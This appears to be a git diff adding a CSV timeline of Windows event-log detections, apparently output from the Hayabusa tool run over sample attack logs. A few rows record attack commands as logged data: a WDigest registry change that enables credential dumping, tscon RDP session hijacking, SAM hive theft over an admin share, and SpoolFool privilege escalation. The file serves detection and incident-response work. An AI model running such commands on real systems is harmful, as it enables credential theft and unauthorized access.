+2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1112,technique_name=Modify Registry | Cmd: reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 | Process: C:\Windows\System32\reg.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1586d8b2 | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000 | Hash: SHA1=0873F40DE395DE017495ED5C7E693AFB55E9F867,MD5=A3F446F1E2B8C6ECE56F608FB32B8DC6,SHA256=849F54DC526EA18D59ABAF4904CB11BC15B982D2952B971F2E1B6FBF8C974B39,IMPHASH=A069A88BBB8016324D7EC0A0EEC459EB",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:49.101 +09:00,fs03vuln.offsec.lan,12,medium,,Registry Key Create/Delete_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | CreateKey: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1003,technique_name=Credential Dumping | SetValue: HKLM\System\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential: DWORD (0x00000001) | Process: C:\Windows\system32\reg.exe | PID: 1524 | PGUID: A57649D1-1271-61F1-315A-8E1500000000",rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-01-26 18:20:52.811 +09:00,fs03vuln.offsec.lan,13,high,Evas,Wdigest Enable UseLogonCredential,,rules/sigma/registry_event/sysmon_wdigest_enable_uselogoncredential.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID1-12-13-Wdigest authentication activation.evtx
+2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-09 05:33:15.159 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: cmd.exe /k tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\cmd.exe | PID: 0x1980 | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-09 05:33:15.166 +09:00,wef.windomain.local,4688,medium,LatMov,Possible RDP Hijacking,Cmd Line: tscon 2 /dest rdp-tcp#14 | Path: C:\Windows\System32\tscon.exe | PID: 0x1b8c | User: WEF$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreation_RDP-Hijacking.yml,../hayabusa-sample-evtx/YamatoSecurity/T1563.002 RDP Hijacking/Security.evtx
+2022-02-16 19:37:07.251 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:19.637 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: 02694W-WIN10$ | Computer: - | IP Addr: 172.16.66.25 | LID: 0x567343,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.450 +09:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: samir | Computer: 02694W-WIN10 | IP Addr: 172.16.66.25 | LID: 0x567515,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.520 +09:00,01566s-win16-ir.threebeesco.com,4776,info,,NTLM Logon To Local Account,User: samir | Computer: 02694W-WIN10 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.521 +09:00,01566s-win16-ir.threebeesco.com,4672,info,,Admin Logon,User: samir | LID: 0x567758,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSAM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.534 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSYSTEM | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.550 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,info,Collect,Network Share File Access,User: samir | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\PSECURITY | IP Addr: 172.16.66.36 | LID: 0x567758,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-16 19:37:20.934 +09:00,01566s-win16-ir.threebeesco.com,5145,high,LatMov,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/remote_sam_registry_access_via_backup_operator_priv.evtx
+2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,info,,Process Created,"Cmd: ""C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe"" -dll C:\ProgramData\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | User: DESKTOP-TTEQ6PR\win10 | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -noexit -command Set-Location -literalPath 'C:\Users\win10\Desktop\SpoolFool-main' | LID: 0x277ef | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.207 +09:00,DESKTOP-TTEQ6PR,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,info,,File Created,Path: C:\Windows\System32\spool\drivers\x64\4\Test.dll | Process: C:\Users\win10\Desktop\SpoolFool-main\SpoolFool.exe | PID: 1232 | PGUID: 08DA6306-2A54-6211-0B01-000000001000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.301 +09:00,DESKTOP-TTEQ6PR,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
+2022-02-20 02:35:16.328 +09:00,DESKTOP-TTEQ6PR,7,info,Persis | Evas | PrivEsc,Windows Spooler Service Suspicious Binary Load,,rules/sigma/image_load/sysmon_spoolsv_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_spoolfool_mahdihtm_sysmon_1_11_7_13.evtx
diff --git a/sample-evtx.csv b/sample-evtx.csv
new file mode 100644
index 00000000..303b4e52
--- /dev/null
+++ b/sample-evtx.csv
@@ -0,0 +1,16623 @@
+Timestamp,Computer,EventID,Level,MitreAttack,RuleTitle,Details,RulePath,FilePath
+2013-10-24 01:16:13.843 +09:00,37L4247D28-05,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:16:27.000 +09:00,37L4247D28-05,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:16:29.000 +09:00,37L4247D28-05,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:17:29.468 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Heartbeat Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Heartbeat | Account: NT AUTHORITY\NetworkService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:32.328 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: SynthVid | Path: system32\DRIVERS\VMBusVideoM.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:38.218 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Data Exchange Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature KvpExchange | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:40.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Guest Shutdown Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature Shutdown | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:41.421 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Volume Shadow Copy Requestor | Path: %SystemRoot%\system32\vmicsvc.exe -feature VSS | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:43.125 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: netvsc | Path: system32\DRIVERS\netvsc60.sys | Account:  | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:17:44.875 +09:00,37L4247D28-05,7045,info,Persis,Service Installed,Name: Hyper-V Time Synchronization Service | Path: %SystemRoot%\system32\vmicsvc.exe -feature TimeSync | Account: NT AUTHORITY\LocalService | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2003,low,,Setting Change in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_setting_change.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:09.203 +09:00,37L4247D28-05,2004,medium,,Added Rule in Windows Firewall with Advanced Security,,../hayabusa-rules/sigma/builtin/firewall_as/win_firewall_as_add_rule.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:11.000 +09:00,37L4247D28-05,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:18:50.500 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:21:28.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 01:21:30.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 01:21:33.630 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.911 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:39.973 +09:00,IE8Win7,4720,low,Persis,Local User Account Created,User: IEUser | SID: S-1-5-21-3463664321-2923530833-3546627382-1000,../hayabusa-rules/hayabusa/default/alerts/Security/4720_AccountCreated_UserAccountCreated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/new-user-security.evtx
+2013-10-24 01:22:40.004 +09:00,IE8Win7,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-3463664321-2923530833-3546627382-1000 | Group: Administrators | LID: 0x3e7,../hayabusa-rules/hayabusa/default/alerts/Security/4732-MemberAddedToLocalGroup_Administrators.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x298c5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: WIN-QALA5Q3KJ43 | IP Addr: 127.0.0.1 | LID: 0x29908 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: WIN-QALA5Q3KJ43$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:22:44.979 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x298c5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 01:24:00.161 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:27:21.754 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x29908,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:29:39.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:52.625 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:30:56.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:30:58.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:31:10.741 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:32:13.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:10.078 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:33:15.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:33:18.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:33:31.593 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d5b | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x57d8d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:36:53.671 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x57d5b,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:29.131 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:45:45.037 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x57d8d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:46:48.772 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Windows Activation Technologies Service | Path: %SystemRoot%\system32\Wat\WatAdminSvc.exe | Account: LocalSystem | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:48:35.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:25.546 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:50:26.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 02:50:27.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2013-10-24 02:50:33.551 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27f43,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f43 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:51:17.207 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27f73 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 02:55:52.082 +09:00,IE8Win7,7045,info,Persis,Service Installed,Name: Microsoft .NET Framework NGEN v4.0.30319_X86 | Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe | Account: LocalSystem | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2013-10-24 04:02:24.316 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27f73,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2013-10-24 04:03:23.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
